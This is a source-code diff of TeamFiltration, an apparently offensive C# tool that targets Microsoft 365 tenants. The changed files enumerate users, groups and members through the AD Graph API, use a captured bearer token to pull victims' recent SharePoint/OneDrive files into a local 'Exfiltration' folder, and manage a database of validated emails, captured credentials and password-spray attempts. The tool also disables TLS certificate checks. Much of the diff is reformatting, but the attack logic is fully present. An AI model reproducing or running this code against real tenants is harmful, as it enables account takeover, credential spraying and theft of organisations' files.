-                var GetDomainsAdGraphRespNext = await GetDomainsAdGraphReqNext.Content.ReadAsStringAsync();
-                var GetDomainsAdGraphRespDataNext = JsonConvert.DeserializeObject<DomainRespAAD>(GetDomainsAdGraphRespNext);
-
-                GetDomainsAdGraphDataResp.value.AddRange(GetDomainsAdGraphRespDataNext.value);
-                GetDomainsAdGraphDataResp.odatanextLink = GetDomainsAdGraphRespDataNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(GetDomainsAdGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-            }
-            return GetDomainsAdGraphDataResp;
-        }
-        public async Task<GroupsRespAAD> GetGroupsAdGraph(string tenantId)
-        {
-
-            var getGroupsAdGraphReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups?&api-version=1.6&$top=800&$select=objectType,description,objectId,displayName,mailNickname,onPremisesSamAccountName");
-            var getGroupsAdGraphResp = await getGroupsAdGraphReq.Content.ReadAsStringAsync();
-            var getGroupsAdGraphDataResp = JsonConvert.DeserializeObject<GroupsRespAAD>(getGroupsAdGraphResp);
-
-            bool fetchedAll = false;
-            if (string.IsNullOrEmpty(getGroupsAdGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-
-            while (!fetchedAll)
-            {
-                var getGroupsAdGraphNextLink = getGroupsAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
-                var getGroupsAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups?&api-version=1.6&$top=800&$select=objectType,description,objectId,displayName,mailNickname,onPremisesSamAccountName&$skiptoken=" + getGroupsAdGraphNextLink);
-                var getGroupsAdGraphRespNext = await getGroupsAdGraphReqNext.Content.ReadAsStringAsync();
-                var getGroupsAdGraphRespDataNext = JsonConvert.DeserializeObject<GroupsRespAAD>(getGroupsAdGraphRespNext);
-                getGroupsAdGraphDataResp.value.AddRange(getGroupsAdGraphRespDataNext.value);
-                getGroupsAdGraphDataResp.odatanextLink = getGroupsAdGraphRespDataNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(getGroupsAdGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-
-            }
-            return getGroupsAdGraphDataResp;
-        }
-        public async Task<GetMembersAAD> GetGroupMembersAdGraph(string groupId, string tenantId)
-        {
-            bool fetchedAll = false;
-
-            var getGroupMemReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups/{groupId}/members?&api-version=1.6&$select=userPrincipalName,mail,mailNickname,objectId,displayName,facsimileTelephoneNumber,department,mobile");
-            var getGroupMemResp = await getGroupMemReq.Content.ReadAsStringAsync();
-            var getGroupMemDataResp = JsonConvert.DeserializeObject<GetMembersAAD>(getGroupMemResp);
-
-            if (string.IsNullOrEmpty(getGroupMemDataResp.odatanextLink))
-                fetchedAll = true;
-
-            while (!fetchedAll)
-            {
-                var getGroupMemSkipToken = getGroupMemDataResp.odatanextLink.Split("skiptoken=")[1];
-                var getGroupMemReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups/{groupId}/members?&api-version=1.6&$select=userPrincipalName,mail,mailNickname,objectId,displayName,facsimileTelephoneNumber,department,mobile&$skiptoken=" + getGroupMemSkipToken);
-                var getGroupMemRespNext = await getGroupMemReqNext.Content.ReadAsStringAsync();
-                var getGroupMemDataRespNext = JsonConvert.DeserializeObject<GetMembersAAD>(getGroupMemRespNext);
-
-                getGroupMemDataResp.value.AddRange(getGroupMemDataRespNext.value);
-                getGroupMemDataResp.odatanextLink = getGroupMemDataRespNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(getGroupMemDataResp.odatanextLink))
-                    fetchedAll = true;
-            }
-
-            return getGroupMemDataResp;
-        }
-        public async Task<UserRespAAD> GetUsersAdGraph(string tenantId)
-        {
-
-            var getUsersAdGraph = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/users?&api-version=1.6");
-            var getUsersAdGraphResp = await getUsersAdGraph.Content.ReadAsStringAsync();
-            var getUsersAdGraphDataResp = JsonConvert.DeserializeObject<UserRespAAD>(getUsersAdGraphResp);
-
-            bool fetchedAll = false;
-            if (string.IsNullOrEmpty(getUsersAdGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-            while (!fetchedAll)
-            {
-
-                var getUsersAdGraphSkipToken = getUsersAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
-                var getUsersAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/users?&api-version=1.6&$skiptoken=" + getUsersAdGraphSkipToken);
-                var getUsersAdGraphRespNext = await getUsersAdGraphReqNext.Content.ReadAsStringAsync();
-                var getUsersAdGraphDataRespNext = JsonConvert.DeserializeObject<UserRespAAD>(getUsersAdGraphRespNext);
-                getUsersAdGraphDataResp.value.AddRange(getUsersAdGraphDataRespNext.value);
-                getUsersAdGraphDataResp.odatanextLink = getUsersAdGraphDataRespNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(getUsersAdGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-            }
-            return getUsersAdGraphDataResp;
-        }
-
-      
-
-    }
+	}
 }

--- a/TeamFiltration/TeamFiltration/Handlers/SharePointHandler.cs
+++ b/TeamFiltration/TeamFiltration/Handlers/SharePointHandler.cs
@@ -1,102 +1,103 @@
-﻿using Newtonsoft.Json;
+﻿using KoenZomers.OneDrive.Api;
+using Newtonsoft.Json;
 using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Net;
 using System.Net.Http;
+using System.Net.NetworkInformation;
+using System.Security.Authentication;
 using System.Text;
 using System.Threading.Tasks;
+using TeamFiltration.Helpers;
 using TeamFiltration.Models.MSOL;
 using TeamFiltration.Models.TeamFiltration;
 using TeamFiltration.Models.Teams;
-using TeamFiltration.Helpers;
-using KoenZomers.OneDrive.Api;
-using System.Security.Authentication;
 
 namespace TeamFiltration.Handlers
 {
-    class SharePointHandler
-    {
-        private HttpClient _sharePointClient;
+	class SharePointHandler
+	{
+		private HttpClient _sharePointClient;
 
-        private BearerTokenResp _getBearToken { get; set; }
-        private GlobalArgumentsHandler _teamFiltrationConfig { get; set; }
-        private DatabaseHandler _databaseHandler { get; set; }
-        private string _username { get; set; }
+		private BearerTokenResp _getBearToken { get; set; }
+		private GlobalArgumentsHandler _teamFiltrationConfig { get; set; }
+		private DatabaseHandler _databaseHandler { get; set; }
+		private string _username { get; set; }
 
 
-        public SharePointHandler(BearerTokenResp getBearToken, string username, GlobalArgumentsHandler teamFiltrationConfig, DatabaseHandler databaseHandler, bool debugMode = false)
-        {
-            this._getBearToken = getBearToken;
-            this._username = username;
-            this._databaseHandler = databaseHandler;
-            _teamFiltrationConfig = teamFiltrationConfig;
+		public SharePointHandler(BearerTokenResp getBearToken, string username, GlobalArgumentsHandler teamFiltrationConfig, DatabaseHandler databaseHandler, bool debugMode = false)
+		{
+			this._getBearToken = getBearToken;
+			this._username = username;
+			this._databaseHandler = databaseHandler;
+			_teamFiltrationConfig = teamFiltrationConfig;
 
-            var proxy = new WebProxy
-            {
-                Address = new Uri($"http://127.0.0.1:8080"),
-                BypassProxyOnLocal = false,
-                UseDefaultCredentials = false,
-            };
+			var proxy = new WebProxy
+			{
+				Address = new Uri(teamFiltrationConfig.TeamFiltrationConfig.proxyEndpoint),
+				BypassProxyOnLocal = false,
+				UseDefaultCredentials = false,
+			};
 
-            var httpClientHandler = new HttpClientHandler
-            {
-                Proxy = proxy,
-                ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
-                {
-                    return true;
-                },
-                SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls,
-                UseProxy = debugMode
-            };
+			var httpClientHandler = new HttpClientHandler
+			{
+				Proxy = proxy,
+				ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
+				{
+					return true;
+				},
+				SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls,
+				UseProxy = debugMode
+			};
 
-            _sharePointClient = new HttpClient(httpClientHandler);
-            _sharePointClient.DefaultRequestHeaders.Add("Authorization", $"Bearer {getBearToken.access_token}");
-        }
+			_sharePointClient = new HttpClient(httpClientHandler);
+			_sharePointClient.DefaultRequestHeaders.Add("Authorization", $"Bearer {getBearToken.access_token}");
+		}
 
-  
 
-        public async Task<DownloadUrlResp> GetDownloadInfo(string baseUrl)
-        {
-            var getDownloadInfoReq = await _sharePointClient.PollyGetAsync($"{baseUrl}/driveItem?select=@microsoft.graph.downloadUrl");
-            var getDownloadInfoResp = await getDownloadInfoReq.Content.ReadAsStringAsync();
-            return JsonConvert.DeserializeObject<DownloadUrlResp>(getDownloadInfoResp);
-        }
 
-        public async Task DownloadRecentFiles(TeamsFileResp recentFiles, string outPath, string module)
-        {
+		public async Task<DownloadUrlResp> GetDownloadInfo(string baseUrl)
+		{
+			var getDownloadInfoReq = await _sharePointClient.PollyGetAsync($"{baseUrl}/driveItem?select=@microsoft.graph.downloadUrl");
+			var getDownloadInfoResp = await getDownloadInfoReq.Content.ReadAsStringAsync();
+			return JsonConvert.DeserializeObject<DownloadUrlResp>(getDownloadInfoResp);
+		}
 
-            var newOutPath = Path.Combine(outPath, "RecentFiles");
+		public async Task DownloadRecentFiles(TeamsFileResp recentFiles, string outPath, string module)
+		{
 
-            Directory.CreateDirectory(newOutPath);
+			var newOutPath = Path.Combine(outPath, "RecentFiles");
 
-            using (var webClient = new WebClient())
-            {
+			Directory.CreateDirectory(newOutPath);
 
-                foreach (var file in recentFiles.value.Where(x => x.objectUrl.StartsWith(_getBearToken.resource)))
-                {
-                    try
-                    {
-                        _databaseHandler.WriteLog(new Log("EXFIL", "-->" + file.title));
+			using (var webClient = new WebClient())
+			{
 
-                        if (file.siteInfo.siteUrl == null)
-                        {
-                            file.siteInfo.siteUrl = _getBearToken.resource + "/_api/v2.0/shares/u!" + Convert.ToBase64String(Encoding.UTF8.GetBytes(file.objectUrl)).Replace("=", "");
-                        }
-                        else
-                        {
-                            file.siteInfo.siteUrl += "/_api/v2.0/sites/root/items/" + file.objectId;
-                        }
-                        var downloadInfo = await GetDownloadInfo(file.siteInfo.siteUrl);
-                        webClient.DownloadFile(downloadInfo.ContentDownloadUrl, Path.Combine(newOutPath, file.title));
-                    }
-                    catch (Exception e)
-                    {
-                        _databaseHandler.WriteLog(new Log(module, $"Failed to download file {file.title}"));
-                    }
-                }
-            }
-        }
-    }
+				foreach (var file in recentFiles.value.Where(x => x.objectUrl.StartsWith(_getBearToken.resource)))
+				{
+					try
+					{
+						_databaseHandler.WriteLog(new Log("EXFIL", "-->" + file.title));
+
+						if (file.siteInfo.siteUrl == null)
+						{
+							file.siteInfo.siteUrl = _getBearToken.resource + "/_api/v2.0/shares/u!" + Convert.ToBase64String(Encoding.UTF8.GetBytes(file.objectUrl)).Replace("=", "");
+						}
+						else
+						{
+							file.siteInfo.siteUrl += "/_api/v2.0/sites/root/items/" + file.objectId;
+						}
+						var downloadInfo = await GetDownloadInfo(file.siteInfo.siteUrl);
+						webClient.DownloadFile(downloadInfo.ContentDownloadUrl, Path.Combine(newOutPath, file.title));
+					}
+					catch (Exception e)
+					{
+						_databaseHandler.WriteLog(new Log(module, $"Failed to download file {file.title}"));
+					}
+				}
+			}
+		}
+	}
 }

--- a/TeamFiltration/TeamFiltration/Modules/Database.cs
+++ b/TeamFiltration/TeamFiltration/Modules/Database.cs
@@ -15,235 +15,239 @@ using System.Threading;
 
 namespace TeamFiltration.Modules
 {
-    public class Database
-    {
-        public static string ToCsv<T>(string separator, List<T> objectlist)
-        {
-            Type t = objectlist.FirstOrDefault().GetType();
-            var fields = t.GetProperties();
+	public class Database
+	{
+		public static string ToCsv<T>(string separator, List<T> objectlist)
+		{
+			Type t = objectlist.FirstOrDefault().GetType();
+			var fields = t.GetProperties();
 
-            string header = String.Join(separator, fields.Select(f => f.Name).ToArray());
+			string header = String.Join(separator, fields.Select(f => f.Name).ToArray());
 
-            StringBuilder csvdata = new StringBuilder();
-            csvdata.AppendLine(header);
+			StringBuilder csvdata = new StringBuilder();
+			csvdata.AppendLine(header);
 
-            foreach (var o in objectlist)
-                csvdata.AppendLine(ToCsvFields(separator, fields, o));
+			foreach (var o in objectlist)
+				csvdata.AppendLine(ToCsvFields(separator, fields, o));
 
-            return csvdata.ToString();
-        }
+			return csvdata.ToString();
+		}
 
-        public static string ToCsvFields(string separator, PropertyInfo[] fields, object o)
-        {
-            StringBuilder linie = new StringBuilder();
+		public static string ToCsvFields(string separator, PropertyInfo[] fields, object o)
+		{
+			StringBuilder linie = new StringBuilder();
 
-            foreach (var f in fields)
-            {
-                if (linie.Length > 0)
-                    linie.Append(separator);
+			foreach (var f in fields)
+			{
+				if (linie.Length > 0)
+					linie.Append(separator);
 
-                var x = f.GetValue(o);
+				var x = f.GetValue(o);
 
-                if (x != null)
-                    linie.Append(x.ToString());
-            }
+				if (x != null)
+					linie.Append(x.ToString());
+			}
 
-            return linie.ToString();
-        }
-
-
-        public static DatabaseHandler _dataBaseHandler { get; set; }
-
-        public static void DatabaseStart(string[] args)
-        {
-            _dataBaseHandler = new DatabaseHandler(args);
-
-            var _globalProperties = new GlobalArgumentsHandler(args, _dataBaseHandler);
+			return linie.ToString();
+		}
 
 
+		public static DatabaseHandler _dataBaseHandler { get; set; }
+
+		public static void DatabaseStart(string[] args)
+		{
+			_dataBaseHandler = new DatabaseHandler(args);
+
+			var _globalProperties = new GlobalArgumentsHandler(args, _dataBaseHandler);
 
 
-            Console.WriteLine($"[+] Attempting to load database file {_dataBaseHandler.DatabaseFullPath}");
 
 
-            var rootExfilFolder = Path.Combine(_globalProperties.OutPutPath, "Exfiltration");
-            while (true)
-            {
-                try
-                {
-
-                    //Hardcoded and rather shitty "interactive" menu
-                    Console.WriteLine("[+] Available commands:\n");
-
-                    Console.WriteLine($"    show <emails|creds|attempts|summary|fireprox>\n    export <emails|creds|attempts|summary> <csv|json> <path>\n    delete <*|fireprox-id> <fireprox-region>\n    exit");
-
-                    Console.WriteLine();
-                    Console.Write("[?] CMD #> ");
-
-                    var selection = Console.ReadLine().Split(' ');
-
-                    List<object> dataOut = null;
-                    string formattedDataOut = "";
-
-                    //Get the correct data source
-                    if (selection.Contains("emails"))
-                        dataOut = _dataBaseHandler.QueryValidAccount().Select(x => (object)x).ToList();
-
-                    if (selection.Contains("creds"))
-                        dataOut = _dataBaseHandler.QueryValidLogins().Select(x => (object)x).ToList();
-
-                    if (selection.Contains("attempts"))
-                        dataOut = _dataBaseHandler.QueryAllSprayAttempts().Select(x => (object)x).ToList();
-
-                    if (selection.Contains("fireprox"))
-                        dataOut = _dataBaseHandler.QueryAllFireProxEndpoints().Select(x => (object)x).ToList();
-
-                    if (selection.Contains("summary"))
-                    {
-                        //We need to make a usefull datastructure for this
-                        var sprayAttempts = _dataBaseHandler.QueryAllSprayAttempts().Select(x => x).ToList();
-
-                        var spraySummaryList = new List<SpraySummary>() { };
-                        foreach (var passwordGroups in sprayAttempts.GroupBy(x => x.Password))
-                        {
-                            var sortedpasswordGroups = passwordGroups.OrderByDescending(x => x.DateTime);
-                            spraySummaryList.Add(new SpraySummary()
-                            {
-                                Password = passwordGroups.FirstOrDefault().Password,
-                                SuccesCount = passwordGroups.Where(x => x.Valid).Count(),
-                                TotalCount = passwordGroups.Count(),
-                                StartTime = sortedpasswordGroups.Last().DateTime,
-                                StopTime = sortedpasswordGroups.First().DateTime,
+			Console.WriteLine($"[+] Attempting to load database file {_dataBaseHandler.DatabaseFullPath}");
 
 
-                            });
+			var rootExfilFolder = Path.Combine(_globalProperties.OutPutPath, "Exfiltration");
+			while (true)
+			{
+				try
+				{
 
-                        }
-                        dataOut = spraySummaryList.Select(x => (object)x).ToList();
-                    }
+					//Hardcoded and rather shitty "interactive" menu
+					Console.WriteLine("[+] Available commands:\n");
 
+					Console.WriteLine($"    show <emails|creds|attempts|summary|fireprox>\n    export <emails|creds|attempts|summary> <csv|json> <path>\n    delete <*|fireprox-id> <fireprox-region>\n    exit");
 
-                    //Format based on o
-                    if (selection.Contains("csv"))
-                        formattedDataOut = ToCsv(";", dataOut);
+					Console.WriteLine();
+					Console.Write("[?] CMD #> ");
 
-                    if (selection.Contains("json"))
-                        formattedDataOut = JsonConvert.SerializeObject(dataOut, Formatting.Indented);
+					var selection = Console.ReadLine().Split(' ');
 
-                    if (selection[0].ToLower().Equals("show"))
-                    {
-                        if (dataOut.Count() > 0)
-                        {
+					List<object> dataOut = null;
+					string formattedDataOut = "";
 
-                            if (dataOut.FirstOrDefault().GetType().Equals(typeof(SprayAttempt)))
-                                ConsoleTable
-                                   .From<SprayAttemptPretty>(dataOut.Select(x => (SprayAttemptPretty)((SprayAttempt)x)))
-                                   .Configure(o => o.NumberAlignment = Alignment.Right)
-                                   .Write(Format.Alternative);
-                            else if (dataOut.FirstOrDefault().GetType().Equals(typeof(ValidAccount)))
-                                ConsoleTable
-                                .From<ValidAccount>(dataOut.Select(x => (ValidAccount)x))
-                                .Configure(o => o.NumberAlignment = Alignment.Right)
-                                .Write(Format.Alternative);
-                            else if (dataOut.FirstOrDefault().GetType().Equals(typeof(SpraySummary)))
-                                ConsoleTable
-                                .From<SpraySummary>(dataOut.Select(x => (SpraySummary)x))
-                                .Configure(o => o.NumberAlignment = Alignment.Right)
-                                .Write(Format.Alternative);
-                            else if (dataOut.FirstOrDefault().GetType().Equals(typeof(SprayAttempt)))
-                                ConsoleTable
-                                .From<SprayAttempt>(dataOut.Select(x => (SprayAttempt)x))
-                                .Configure(o => o.NumberAlignment = Alignment.Right)
-                                .Write(Format.Alternative);
-                            else if (dataOut.FirstOrDefault().GetType().Equals(typeof(FireProxEndpoint)))
-                                ConsoleTable
-                                .From<FireProxEndpoint>(dataOut.Select(x => (FireProxEndpoint)x))
-                                .Configure(o => o.NumberAlignment = Alignment.Right)
-                                .Write(Format.Alternative);
-                        }
-                        else
-                        {
-                            Console.WriteLine("[+] No entries!");
-                        };
+					//Get the correct data source
+					if (selection.Contains("emails"))
+						dataOut = _dataBaseHandler.QueryValidAccount().Select(x => (object)x).ToList();
 
-                    }
-                    else if (selection[0].ToLower().Equals("export"))
-                    {
-                        var outPath = selection[selection.Length - 1];
+					if (selection.Contains("creds"))
+						dataOut = _dataBaseHandler.QueryValidLogins().Select(x => (object)x).ToList();
 
-                        //If the path supplied has spaces, we need to fix that
-                        if (selection.Length > 3)
-                        {
-                            outPath = "";
-                            bool addSpaces = false;
-                            for (int i = 3; i < selection.Length; i++)
-                            {
-                                if (!addSpaces)
-                                {
-                                    addSpaces = true;
-                                    outPath += selection[i];
-                                }
-                                else
-                                    outPath += " " + selection[i];
-                            }
-                        }
+					if (selection.Contains("attempts"))
+						dataOut = _dataBaseHandler.QueryAllSprayAttempts().Select(x => (object)x).ToList();
+
+					if (selection.Contains("fireprox"))
+						dataOut = _dataBaseHandler.QueryAllFireProxEndpoints().Select(x => (object)x).ToList();
+
+					if (selection.Contains("summary"))
+					{
+						//We need to make a usefull datastructure for this
+						var sprayAttempts = _dataBaseHandler.QueryAllSprayAttempts().Select(x => x).ToList();
+
+						var spraySummaryList = new List<SpraySummary>() { };
+						foreach (var passwordGroups in sprayAttempts.GroupBy(x => x.Password))
+						{
+							var sortedpasswordGroups = passwordGroups.OrderByDescending(x => x.DateTime);
+							spraySummaryList.Add(new SpraySummary()
+							{
+								Password = passwordGroups.FirstOrDefault().Password,
+								SuccesCount = passwordGroups.Where(x => x.Valid).Count(),
+								TotalCount = passwordGroups.Count(),
+								StartTime = sortedpasswordGroups.Last().DateTime,
+								StopTime = sortedpasswordGroups.First().DateTime,
 
 
-                        File.WriteAllText(outPath, formattedDataOut);
-                    }
-                    else if (selection[0].ToLower().Equals("delete"))
-                    {
-                        //Thanks Chris!
-                        if (_globalProperties.TeamFiltrationConfig == null)
-                        {
-                            Console.WriteLine("[!] In order to delete a fireprox endpoint you must provide the configuration file using '--config'");
-                            Environment.Exit(0);
-                        }
-                        if (string.IsNullOrEmpty(_globalProperties.TeamFiltrationConfig?.AWSAccessKey) || string.IsNullOrEmpty(_globalProperties.TeamFiltrationConfig?.AWSSecretKey))
-                        {
-                            Console.WriteLine("[!] Missing AWSAccessKey, AWSSecretKey, and/or AWSSessionToken, must be provided in the configuration file using '--config'");
-                            Environment.Exit(0);
-                        }
+							});
 
-                        if (selection[1].ToLower().Equals("*"))
-                        {
-                            //Delete ALL fireprox instances found in the DB
-                            var fireproxEndpoints = _dataBaseHandler.QueryAllFireProxEndpoints().Select(x => x).ToList();
-                            foreach (var fireproxEndpoint in fireproxEndpoints)
-                            {
-                                //There must be a way to bul delete endpoints?
-                                _globalProperties._awsHandler.DeleteFireProxEndpoint(fireproxEndpoint.RestApiId, fireproxEndpoint.Region).GetAwaiter().GetResult();
-                                Thread.Sleep(1000);
-                            }
-
-                        }
-
-                        else if (selection[1].Length == 10)
-                        {
-                            //delete fireprox instance based on ID and region
-                            if (Amazon.RegionEndpoint.GetBySystemName(selection[2]) != null)
-                                _globalProperties._awsHandler.DeleteFireProxEndpoint(selection[1].ToLower(), selection[2]).GetAwaiter().GetResult();
-                            else
-                                Console.WriteLine("[!] Failed to parse region, example: 'delete aabbccddee us-west-1'");
-                        }
-                    }
-                    else if (selection[0].ToLower().Equals("exit"))
-                    {
-
-                        Environment.Exit(0);
+						}
+						dataOut = spraySummaryList.Select(x => (object)x).ToList();
+					}
 
 
-                    }
+					//Format based on o
+					if (selection.Contains("csv"))
+						formattedDataOut = ToCsv(";", dataOut);
 
-                }
-                catch (Exception ex)
-                {
+					if (selection.Contains("json"))
+						formattedDataOut = JsonConvert.SerializeObject(dataOut, Formatting.Indented);
 
-                    Console.WriteLine("[+] Failed to parse command, are you sure the syntax is correct?");
-                }
+					if (selection[0].ToLower().Equals("show"))
+					{
+						if (dataOut.Count() > 0)
+						{
 
-            }
+							if (dataOut.FirstOrDefault().GetType().Equals(typeof(SprayAttempt)))
+								ConsoleTable
+								   .From<SprayAttemptPretty>(dataOut.Select(x => (SprayAttemptPretty)((SprayAttempt)x)))
+								   .Configure(o => o.NumberAlignment = Alignment.Right)
+								   .Write(Format.Alternative);
+							else if (dataOut.FirstOrDefault().GetType().Equals(typeof(ValidAccount)))
+								ConsoleTable
+								.From<ValidAccount>(dataOut.Select(x => (ValidAccount)x))
+								.Configure(o => o.NumberAlignment = Alignment.Right)
+								.Write(Format.Alternative);
+							else if (dataOut.FirstOrDefault().GetType().Equals(typeof(SpraySummary)))
+								ConsoleTable
+								.From<SpraySummary>(dataOut.Select(x => (SpraySummary)x))
+								.Configure(o => o.NumberAlignment = Alignment.Right)
+								.Write(Format.Alternative);
+							else if (dataOut.FirstOrDefault().GetType().Equals(typeof(SprayAttempt)))
+								ConsoleTable
+								.From<SprayAttempt>(dataOut.Select(x => (SprayAttempt)x))
+								.Configure(o => o.NumberAlignment = Alignment.Right)
+								.Write(Format.Alternative);
+							else if (dataOut.FirstOrDefault().GetType().Equals(typeof(FireProxEndpoint)))
+								ConsoleTable
+								.From<FireProxEndpoint>(dataOut.Select(x => (FireProxEndpoint)x))
+								.Configure(o => o.NumberAlignment = Alignment.Right)
+								.Write(Format.Alternative);
+						}
+						else
+						{
+							Console.WriteLine("[+] No entries!");
+						}
+						;
 
-        }
-    }
+					}
+					else if (selection[0].ToLower().Equals("export"))
+					{
+						var outPath = selection[selection.Length - 1];
+
+						//If the path supplied has spaces, we need to fix that
+						if (selection.Length > 3)
+						{
+							outPath = "";
+							bool addSpaces = false;
+							for (int i = 3; i < selection.Length; i++)
+							{
+								if (!addSpaces)
+								{
+									addSpaces = true;
+									outPath += selection[i];
+								}
+								else
+									outPath += " " + selection[i];
+							}
+						}
+
+
+						File.WriteAllText(outPath, formattedDataOut);
+					}
+					else if (selection[0].ToLower().Equals("delete"))
+					{
+						// Note: This probably will not be called since we don't use fireprox anymore.
+						Console.WriteLine("[+] The 'delete' is disabled because FireProx functionality has been removed.");
+						/*                        //Thanks Chris!
+												if (_globalProperties.TeamFiltrationConfig == null)
+												{
+													Console.WriteLine("[!] In order to delete a fireprox endpoint you must provide the configuration file using '--config'");
+													Environment.Exit(0);
+												}
+												if (string.IsNullOrEmpty(_globalProperties.TeamFiltrationConfig?.AWSAccessKey) || string.IsNullOrEmpty(_globalProperties.TeamFiltrationConfig?.AWSSecretKey))
+												{
+													Console.WriteLine("[!] Missing AWSAccessKey, AWSSecretKey, and/or AWSSessionToken, must be provided in the configuration file using '--config'");
+													Environment.Exit(0);
+												}
+
+												if (selection[1].ToLower().Equals("*"))
+												{
+													//Delete ALL fireprox instances found in the DB
+													var fireproxEndpoints = _dataBaseHandler.QueryAllFireProxEndpoints().Select(x => x).ToList();
+													foreach (var fireproxEndpoint in fireproxEndpoints)
+													{
+														//There must be a way to bul delete endpoints?
+														_globalProperties._awsHandler.DeleteFireProxEndpoint(fireproxEndpoint.RestApiId, fireproxEndpoint.Region).GetAwaiter().GetResult();
+														Thread.Sleep(1000);
+													}
+
+												}
+
+												else if (selection[1].Length == 10)
+												{
+													//delete fireprox instance based on ID and region
+													if (Amazon.RegionEndpoint.GetBySystemName(selection[2]) != null)
+														_globalProperties._awsHandler.DeleteFireProxEndpoint(selection[1].ToLower(), selection[2]).GetAwaiter().GetResult();
+													else
+														Console.WriteLine("[!] Failed to parse region, example: 'delete aabbccddee us-west-1'");
+												}
+						*/
+					}
+					else if (selection[0].ToLower().Equals("exit"))
+					{
+
+						Environment.Exit(0);
+
+
+					}
+
+				}
+				catch (Exception ex)
+				{
+
+					Console.WriteLine("[+] Failed to parse command, are you sure the syntax is correct?");
+				}
+
+			}
+
+		}
+	}
 }

--- a/TeamFiltration/TeamFiltration/Modules/Enumerate.cs
+++ b/TeamFiltration/TeamFiltration/Modules/Enumerate.cs
@@ -22,630 +22,629 @@ using ConsoleTables;
 
 namespace TeamFiltration.Modules
 {
-    public class EnumOptions
-    {
-
-        public EnumOptions(string[] args)
-        {
-            if (args.Contains("--validate-msol"))
-                this.ValidateAccsO365 = true;
-
-            if (args.Contains("--validate-teams"))
-                this.ValidateAccsTeams = true;
-
-            if (args.Contains("--validate-login"))
-                this.ValidateAccsLogin = true;
-
-            if (args.Contains("--validate-onedrive"))
-                this.ValidateAccsOneDrive = true;
-
-            if (args.Contains("--enum-mfa"))
-                this.EnumMFA = true;
-
-            if (args.Contains("--dehashed"))
-                this.Dehashed = true;
-        }
-
-        public bool EnumMFA { get; set; }
-        public bool ValidateAccsTeams { get; set; }
-        public bool ValidateAccsO365 { get; set; }
-        public bool ValidateAccsLogin { get; set; }
-        public bool ValidateAccsOneDrive { get; set; }
-        public bool Dehashed { get; set; }
-
-    }
-
-    class Enumerate
-    {
-
-        public static GlobalArgumentsHandler _globalProperties { get; set; }
-        public static DatabaseHandler _databaseHandle { get; set; }
-        public static List<string> _teamsObjectIds = new List<string>() { };
-
-        public static async Task<bool> ValidUserWrapperTeams(TeamsHandler teamsHandler, string username, string enumUserUrl)
-        {
-            try
-            {
-
-                //TODO: Should probably make it so that it does not re-enum invalid accounts
-                var validUser = await teamsHandler.EnumUser(username, enumUserUrl);
-
-
-                if (validUser.isValid && !string.IsNullOrEmpty(validUser.objectId))
-                {
-                    //check list and add
-                    if (!_teamsObjectIds.Contains(validUser.objectId))
-                    {
-                        if (!string.IsNullOrEmpty(validUser.Outofofficenote?.message))
-                            _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid (OutOfOffice message found)!", ""));
-                        else
-                            _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
-
-                        try
-                        {
-                            _databaseHandle.WriteValidAcc(new ValidAccount()
-                            {
-                                Username = username,
-                                Id = Helpers.Generic.StringToGUID(username).ToString(),
-                                objectId = validUser.objectId,
-                                DisplayName = (validUser.responseObject != null) ? validUser.responseObject?.displayName : "",
-                                OutOfOfficeMessage = (validUser.Outofofficenote != null) ? validUser.Outofofficenote.message : "",
-                            }
-
-
-                            );
-                            return true;
-                        }
-                        catch (Exception ex)
-                        {
-
-                            //LiteDB needs to fix their crap
-                            return false;
-                        }
-
-                    }
-                    else
-                    {
-                        _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid, but duplicate", ""));
-                    }
-                }
-                else if (validUser.isValid && string.IsNullOrEmpty(validUser.objectId))
-                {
-                    _databaseHandle.WriteLog(new Log("ENUM", $"{username} valid!", ""));
-
-                    try
-                    {
-                        _databaseHandle.WriteValidAcc(new ValidAccount() { Username = username, Id = Helpers.Generic.StringToGUID(username).ToString(), objectId = validUser.objectId });
-                        return true;
-                    }
-                    catch (Exception)
-                    {
-                        return false;
-                        //LiteDB needs to fix their crap
-                    }
-                }
+	public class EnumOptions
+	{
+
+		public EnumOptions(string[] args)
+		{
+			if (args.Contains("--validate-msol"))
+				this.ValidateAccsO365 = true;
+
+			if (args.Contains("--validate-teams"))
+				this.ValidateAccsTeams = true;
+
+			if (args.Contains("--validate-login"))
+				this.ValidateAccsLogin = true;
+
+			if (args.Contains("--validate-onedrive"))
+				this.ValidateAccsOneDrive = true;
+
+			if (args.Contains("--enum-mfa"))
+				this.EnumMFA = true;
+
+			if (args.Contains("--dehashed"))
+				this.Dehashed = true;
+		}
+
+		public bool EnumMFA { get; set; }
+		public bool ValidateAccsTeams { get; set; }
+		public bool ValidateAccsO365 { get; set; }
+		public bool ValidateAccsLogin { get; set; }
+		public bool ValidateAccsOneDrive { get; set; }
+		public bool Dehashed { get; set; }
+
+	}
+
+	class Enumerate
+	{
+
+		public static GlobalArgumentsHandler _globalProperties { get; set; }
+		public static DatabaseHandler _databaseHandle { get; set; }
+		public static List<string> _teamsObjectIds = new List<string>() { };
+
